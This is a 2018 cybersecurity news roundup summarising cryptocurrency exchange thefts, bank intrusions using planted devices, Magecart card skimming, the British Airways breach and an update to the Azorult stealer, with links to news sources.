According to the Cryptocurrency Anti-Money Laundering Report from Ciphertrace some $927 million has been stolen from cryptocurrency exchanges in the first three quarters of 2018 alone. That total will almost certainly have hit, if not smashed straight through, the $1 billion mark by now. So, who were the hackers behind the heists and how did they get away with it?
The how remains sadly predictable throughout the year; exploiting vulnerabilities in crypto wallet software and servers, social engineering / password compromises and insider theft. The who covers equally predictable territory with lone wolf criminal opportunists at the lower end of scale through to well-resourced nation-state actors at the other.
Read more about cryptocurrency theft in 2018 on Forbes.
Cyber-criminal gangs are believed to have stolen tens of millions of dollars from at least eight banks in Eastern Europe using tactics usually seen only in Hollywood movies. These “hacks” consisted of cyber-criminals entering bank offices to inspect and then leave malicious devices connected to the bank’s network.
Russian cyber-security firm Kaspersky Lab, which was called to investigate some of these mysterious cyber-heists, says it found three types of devices at offices at the eight banks it reviewed: cheap laptops, Raspberry Pi boards and malicious USB thumb drives known as Bash Bunnies.
Read more about the Hollywood-style hacks on European banks on ZDNet.
As we move forward to 2019, expect credit card and payment information theft to continue to rise. Yes, this isn’t a major surprise; however, if organizations can better address the reasons for the rise in cybercrime, they will be better prepared.
The good news: advanced security technologies are constantly being brought to market. The not-so-good news: threat actors are not letting that get in the way; witness more intensified and ever more sophisticated attacks.
Although the malicious code was discovered last week, researchers were able to determine its purpose recently, when they managed to decrypt and deobfuscate it.
At least seven different cybercrime groups referred to as “Magecart hackers” are placing digital credit card skimmers on compromised e-commerce sites, Flashpoint and RiskIQ reveal in a joint report. Active since at least 2015, the Magecart hackers steal credit card information by placing digital skimmers on the websites they visit.
After conducting a thorough investigation into these attacks, Flashpoint and RiskIQ security researchers discovered that the Magecart umbrella isn’t representative for a single group of attackers, but for at least seven of them, each with their own skimmers, tactics, targets, and other unique elements. The list, however, is not comprehensive.
Read more about the new research on Magecart on SecurityWeek.
British Airways has revealed that the massive data breach which struck hundreds of thousands of customers is bigger than first believed. The UK carrier said that a further 185,000 customers may have had their information stolen during the data breach.
In total, the threat actors behind the attack potentially gained access to an additional 77,000 payment card records containing names, billing addresses, email addresses, payment information — including card numbers and expiry dates — and the CVV numbers linked to each card. A further 108,000 payment card records were potentially compromised but did not contain an accompanying CVV security number.
Read more about the new figures for the massive data breach on ZDNet.
Cryptocurrency exchange Trade.io has admitted to a security breach. The company said that an unknown party has withdrawn over 50 million Trade tokens (TIO) from its cold storage wallets. The funds are worth over $7.5 million at Monday’s TIO trading price. It is unclear how the hack happened.
Cold storage wallets usually take the form of custom USB-based devices containing login information for an account holding cryptocurrency funds. Trade.io said it stored its cold storage wallet in safety deposit boxes in banks. “We have confirmed that the safety deposit boxes were not compromised,” said Trade.io CEO Jim Preissler.
Read more about the mysterious Trade.io hack on ZDNet.
A form of password, credit card details and cryptocurrency-stealing malware has been updated, making it even more potent for cyber criminals. The Azorult malware has been been operating since 2016 and enables crooks to steal credentials including passwords, credit card details, browser histories and contents of cryptocurrency wallets from victims.
Now a new version of it is being advertised in an underground forum, as uncovered by researchers at tech security company Check Point, who describe it as “substantially updated”. New features include the ability to steal additional forms of crpytocurrency from the wallets of victims – BitcoinGold, electrumG, btcprivate (electrum-btcp), bitcore and Exodus Eden.
Read more about the recent update of the Azorult malware on ZDNet.
Group-IB has estimated that cryptocurrency exchanges suffered a total loss of $882 million due to targeted attacks in 2017 and in the first three quarters of 2018. According to Group-IB experts, at least 14 crypto exchanges were hacked. Five attacks have been linked to North Korean hackers from Lazarus state-sponsored group, including the infamous attack on Japanese crypto exchange Coincheck, when $534 million in crypto was stolen.
In most cases, cybercriminals, while attacking cryptocurrency exchanges, use traditional tools and methods, such as spear phishing, social engineering, distribution of malware, and website defacement.
Credential theft was substantially up in the United States during the third quarter – even as declines were charted in Europe and Asia.
Periodic analysis from Blueliv shows a whopping 141 percent increase in compromised credentials from North American targets between June and August compared to the March through May period. In contrast, there were fewer compromised European and Asian credentials detected over same period (22 percent and 36 percent decreases respectively).
Read more about the findings of the Blueliv analysis on Threatpost.